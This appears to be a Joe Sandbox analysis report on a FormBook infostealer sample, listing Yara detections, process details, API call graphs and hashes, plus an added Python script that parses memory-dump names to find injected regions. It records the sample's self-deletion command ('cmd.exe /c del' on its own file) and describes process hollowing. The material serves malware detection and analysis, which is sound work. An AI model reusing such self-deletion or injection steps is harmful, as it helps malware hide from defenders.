                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false
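                                                                                                                  The Yara match "Source" fields above follow Joe Sandbox's memory dump naming (Target ID, dump number, dump ID, base address, then four hex flag fields). The following added Python, which is not part of the report, parses those names and lists the FormBook hits that land in executable and writable memory, the regions hollowing and injection leave behind in Target 2 and Target 4. Certain facts: field 1 is the Target ID from the process list and field 4 the base address. Assumption, labelled in the code: field 5 is the region's page protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE) and field 7 its MEM_* type; fields 6 and 8 are kept raw. The match list is constructed from the report's lines, trimmed to one rule name per dump.

```python
import re
from collections import defaultdict

# Constructed from the Yara match lines of this report: (rule, dump source).
# The other rules on the page hit the same dumps and are omitted here.
MATCHES = [
    ("JoeSecurity_PureLogStealer", "00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp"),
    ("JoeSecurity_PureLogStealer", "00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp"),
    ("JoeSecurity_FormBook",       "00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp"),
    ("JoeSecurity_FormBook",       "00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp"),
    ("JoeSecurity_FormBook",       "00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp"),
    ("JoeSecurity_FormBook",       "00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp"),
    ("JoeSecurity_FormBook",       "00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp"),
]

# Windows PAGE_* and MEM_* constants (these values are certain); the mapping of
# dump-name fields 5 and 7 onto them is an ASSUMPTION about the naming scheme.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SOURCE_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<dump>\d{8})\.(?P<id>\d+)\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<f5>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\.(?P<f7>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)


def parse_source(name):
    """Split a .sdmp name into fields. proc = Target ID from the process list,
    base = region base address. protect/type are the assumed fields 5 and 7."""
    m = SOURCE_RE.match(name)
    if not m:
        raise ValueError(f"unexpected dump name: {name}")
    protect = int(m["f5"], 16)
    mtype = int(m["f7"], 16)
    return {
        "process": int(m["proc"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, f"0x{protect:X}"),
        "type_name": MEM_TYPE.get(mtype, f"0x{mtype:X}"),
        "raw_fields": (m["f6"], m["f8"]),   # not decoded
    }


def rules_by_process(matches):
    """Target ID -> set of rule names that fired in that process."""
    out = defaultdict(set)
    for rule, src in matches:
        out[parse_source(src)["process"]].add(rule)
    return dict(out)


def executable_writable_hits(matches, rule_prefix="JoeSecurity_FormBook"):
    """(Target ID, base) of rule hits inside PAGE_EXECUTE_READWRITE regions, in
    report order. A legitimately loaded image section is MEM_IMAGE and not
    writable, so RWX code regions are where hollowed/injected payloads live."""
    hits = []
    for rule, src in matches:
        if not rule.startswith(rule_prefix):
            continue
        r = parse_source(src)
        if r["protect"] == 0x40:
            hits.append((r["process"], r["base"]))
    return hits


if __name__ == "__main__":
    for proc, rules in sorted(rules_by_process(MATCHES).items()):
        print(f"Target {proc}: {', '.join(sorted(rules))}")
    for proc, base in executable_writable_hits(MATCHES):
        r = parse_source(next(s for _, s in MATCHES if f"{base:016X}" in s))
        print(f"Target {proc}: FormBook in {r['protect_name']} {r['type_name']} region at 0x{base:08X}")
```

Under the stated field assumption the output singles out Target 2 (the sample's own image base 0x400000, now private RWX memory rather than MEM_IMAGE, which is what "Sample uses process hollowing technique" looks like in a dump listing) and the two RWX mapped regions in help.exe (Target 4), while the PAGE_READWRITE hits in Target 0 are the unpacked payload sitting in the .NET loader's heap before injection.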

                                                                                                                  Target ID:5
                                                                                                                  Start time:14:41:17
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:/c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
                                                                                                                  Imagebase:0xa40000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:14:41:17
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true


                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:8.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:92
                                                                                                                    Total number of Limit Nodes:10
                                                                                                                    execution_graph (rendered graph data not reproduced; nodes carrying API annotations, by function address):
                                                                                                                    • a4d710: DuplicateHandle
                                                                                                                    • a444c4, a45918: CreateActCtxA
                                                                                                                    • a4b060: GetModuleHandleW
                                                                                                                    • a4b0b0, a4b0c0, a4a1c8, a4b2a0: LoadLibraryExW
                                                                                                                    • a4d4c8: GetCurrentProcess (a4d50e), GetCurrentThread (a4d560), GetCurrentProcess (a4d59d), GetCurrentThreadId (a4d5fb)
                                                                                                                    • Main call chain: a44668 → a4467a → a44686 / a44778 → a43e40 → a45c5c → a45c7c → a45cac → a45cdc → a4acf8 / a4cde9; a4acf8 reaches the LoadLibraryExW and GetModuleHandleW resolvers via a4ad30 / a4ad1f → a4ae28 / a4ae19; a4cde9 → a4cfa8 / a4cf99 → a4bb80 → a4d1a4 → a45cdc; a44778 → a4479d → a44888 / a44879 → a444c4 (CreateActCtxA)

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D546
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00A4D583
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D5C0
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A4D619
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 2063062207-3119653880
                                                                                                                    • Opcode ID: f58c95325486c93691e00070c1ae680efc389d2d7d187f6758a1032c614e8ba9
                                                                                                                    • Instruction ID: b12f131ddb614477861584748e26b83327468f1bdc9350cfd2e8bac3b598b814
                                                                                                                    • Opcode Fuzzy Hash: f58c95325486c93691e00070c1ae680efc389d2d7d187f6758a1032c614e8ba9
                                                                                                                    • Instruction Fuzzy Hash: 475168B49003498FDB14DFAAD548BAEBBF1FF88314F248459E409A73A0DB746944CF66
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D546
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00A4D583
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D5C0
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A4D619
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 2063062207-3119653880
                                                                                                                    • Opcode ID: d3262ed654995f4e0751e360680f340c2b5def3ebf3df11ae824c8a6d3223171
                                                                                                                    • Instruction ID: 6bcdc6a54edd1cc3b1eae513374f7438ae891a9dc7027c14c56a9c9c9064dae5
                                                                                                                    • Opcode Fuzzy Hash: d3262ed654995f4e0751e360680f340c2b5def3ebf3df11ae824c8a6d3223171
                                                                                                                    • Instruction Fuzzy Hash: 365137B49003498FDB14DFAAD548B9EBBF1FF88314F248459E409A73A0DB746944CF66
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph for a4ae28 (rendered block graph not reproduced): basic blocks a4ae28-a4ae37 through a4b094-a4b0a8; calls to a497a0 (a4ae39-a4ae46), a4b0b0 / a4b0c0 (a4ae4e), a4a170 (a4aee0-a4aee7), a4a180 (a4af28-a4af31), a4a190 and a4a1a0 (a4af4e-a4af5e); GetModuleHandleW is called in block a4b060-a4b08b, reached from a4af98-a4b058
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00A4B07E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 4139908857-3119653880
                                                                                                                    • Opcode ID: 6a774a3b6e44f2e64d3dfc841928584d3d95a17f78cf35667fd3958bca5e1676
                                                                                                                    • Instruction ID: d9a3fb3aaae85ca68e7d4e3dfd1dea9afcafee24acb3ae2aed8f9f95392d96e1
                                                                                                                    • Opcode Fuzzy Hash: 6a774a3b6e44f2e64d3dfc841928584d3d95a17f78cf35667fd3958bca5e1676
                                                                                                                    • Instruction Fuzzy Hash: 50714574A00B058FEB24DF2AD45575ABBF1FF88700F008A2DE49AC7A40DB75E949CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: 8 basic blocks spanning a4590d-a45a61; CreateActCtxA is called in the entry block a4590d-a459d9.
APIs
• CreateActCtxA.KERNEL32(?), ref: 00A459C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: Create
• String ID: `&Cl
• API String ID: 2289755597-3119653880
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: 8 basic blocks spanning a444c4-a45a61; CreateActCtxA is called in the entry block a444c4-a459d9.
APIs
• CreateActCtxA.KERNEL32(?), ref: 00A459C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: Create
• String ID: `&Cl
• API String ID: 2289755597-3119653880
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: 4 basic blocks spanning a4d708-a4d7ca; DuplicateHandle is called in block a4d710-a4d7a4.
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A4D797
Strings
Memory Dump Source
• Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: `&Cl
• API String ID: 3793708945-3119653880
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: 3 basic blocks spanning a4d710-a4d7ca; DuplicateHandle is called in the entry block a4d710-a4d7a4.
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A4D797
Strings
Memory Dump Source
• Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: `&Cl
• API String ID: 3793708945-3119653880
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: 5 basic blocks spanning a4a1c8-a4b33d; LoadLibraryExW is called in block a4b2e8-a4b317.
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A4B0F9,00000800,00000000,00000000), ref: 00A4B30A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: LibraryLoad
• String ID: `&Cl
• API String ID: 1029625771-3119653880
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: 5 basic blocks spanning a4b298-a4b33d; LoadLibraryExW is called in block a4b2e8-a4b317.
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A4B0F9,00000800,00000000,00000000), ref: 00A4B30A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: LibraryLoad
• String ID: `&Cl
• API String ID: 1029625771-3119653880
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: 5 basic blocks spanning a4b018-a4b0a8; GetModuleHandleW is called in block a4b060-a4b08b.
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00A4B07E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: HandleModule
• String ID: `&Cl
• API String ID: 4139908857-3119653880
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                    • Opcode ID: c0bb944c752b5c79f2ebcf2b7983df2e08c8a4f3b18059a6a0bf262968d3bc97
                                                                                                                    • Instruction ID: cf4fa172ca65ad4bd9f37f2e92443564128a6336896a42c72618091f6cd6604d
                                                                                                                    • Opcode Fuzzy Hash: c0bb944c752b5c79f2ebcf2b7983df2e08c8a4f3b18059a6a0bf262968d3bc97
                                                                                                                    • Instruction Fuzzy Hash: FD213771604308DFDB05DF10D9C4B26BB66FB84314F20C96DDA094B282C33AD806CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 766777ee6ece6f2d7e8fdec654c9deb42e29ae8b16cdd3d8615ba35cd78edec6
                                                                                                                    • Instruction ID: ff37008ac0d0da6faa63146b517b53c44bb9453dffed03952d9ad917b4a95dda
                                                                                                                    • Opcode Fuzzy Hash: 766777ee6ece6f2d7e8fdec654c9deb42e29ae8b16cdd3d8615ba35cd78edec6
                                                                                                                    • Instruction Fuzzy Hash: F2219F755093C48FCB02CF24D990715BF72EB46314F28C5EAD9498F2A7C33A980ACB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction ID: dea5ca5eda1ac3e0555d5ba761075546604c3931bb53577c74ea3363560f0229
                                                                                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction Fuzzy Hash: 60112676504280DFCB02CF00D5C0B16BF72FBA4324F24C2A9D8090B2A7C33AE856CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction ID: ab6608e5d66a9e96817f547cd56b9cd513307853e5909da674b399e84f91ecc7
                                                                                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction Fuzzy Hash: A111E676504280DFCB16CF14D9C4B16BF72FB94324F24C6ADE8490B65AC33AD856CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                    • Instruction ID: 5793a618827610200e6f29f65f391ef7036bdcac8de7e3ae50244507f6fb40c6
                                                                                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                    • Instruction Fuzzy Hash: 6311DD75504284DFDB02CF10C5C0B25FBB2FB84324F24C6AED9494B296C33AD81ACBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aa667bfe99a4b04410ba7797a21ea8e350cb28e6c91e9480f61ccdb9911aa6e3
                                                                                                                    • Instruction ID: dcf15e24cc0459c68c605af11cf7c7f6c5f3c1a3b486c8c183479735e9ca060d
                                                                                                                    • Opcode Fuzzy Hash: aa667bfe99a4b04410ba7797a21ea8e350cb28e6c91e9480f61ccdb9911aa6e3
                                                                                                                    • Instruction Fuzzy Hash: 6B01F7B10053849AF7215F12CC84B26BF9CEF81725F14C91AED094A282C77A9C40CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1472a461d7acd47186706102cfe8a0efa72ea9b7131f36651bb6f466caca5e2d
                                                                                                                    • Instruction ID: 924c573c0f0ee94f95caa6ea4b768237019715fd26d996ed964c8fae0e7c5982
                                                                                                                    • Opcode Fuzzy Hash: 1472a461d7acd47186706102cfe8a0efa72ea9b7131f36651bb6f466caca5e2d
                                                                                                                    • Instruction Fuzzy Hash: B8F06D71405384AEE7219F16C888B62FF9CEB95734F18C45AED484A286C27AAC44CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cfbcc3d8bb51b3c54d872870f86637821682bb98710f881ad65eab21cffea3fd
                                                                                                                    • Instruction ID: 5c42f7c8aba5b620ee5360de082d4087a103e1e751ec03732c61fdef9d56e688
                                                                                                                    • Opcode Fuzzy Hash: cfbcc3d8bb51b3c54d872870f86637821682bb98710f881ad65eab21cffea3fd
                                                                                                                    • Instruction Fuzzy Hash: 5DA15A36E00209CFCF15DFA8C98459EB7B2FFC5300B25957AE905AB266DB71E916CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                    Signature Coverage:6.1%
                                                                                                                    Total number of Nodes:560
                                                                                                                    Total number of Limit Nodes:1
LdrInitializeThunk 97322->97325 97323 419bc9 97323->97280 97323->97281 97325->97323 97327 40831e 97326->97327 97328 40acf0 LdrLoadDll 97327->97328 97329 408343 97328->97329 97330 414e50 LdrLoadDll 97329->97330 97331 408353 97330->97331 97332 40835c PostThreadMessageW 97331->97332 97333 408370 97331->97333 97332->97333 97333->97253 97335 40f683 97334->97335 97341 419e90 97335->97341 97339 41af60 LdrLoadDll 97338->97339 97340 419d6c 97339->97340 97340->97261 97342 419eac 97341->97342 97343 41af60 LdrLoadDll 97341->97343 97346 1a32dd0 LdrInitializeThunk 97342->97346 97343->97342 97344 40f6ae 97344->97253 97346->97344 97347->97184 97349 41af60 LdrLoadDll 97348->97349 97350 419fdc 97349->97350 97353 1a32f30 LdrInitializeThunk 97350->97353 97351 40f4fe 97351->97190 97351->97191 97353->97351 97354->97196 97355->97201 97356->97206 97359 1a32ad0 LdrInitializeThunk

Control-flow Graph

control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
Strings
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: cfd044915a8c4d8626de4c58d3b1f637a2856d2db2924349a6fa37f39c05cbfa
• Instruction ID: 3b13b53766a8699ad8374ac4195570079fd8d58ed1159c955b22eae96201029b
• Opcode Fuzzy Hash: cfd044915a8c4d8626de4c58d3b1f637a2856d2db2924349a6fa37f39c05cbfa
• Instruction Fuzzy Hash: B2F0F4B2200108AFCB18CF89DC80EEB77A9FF8C354F158259BA1DD7240D630E851CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
Strings
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
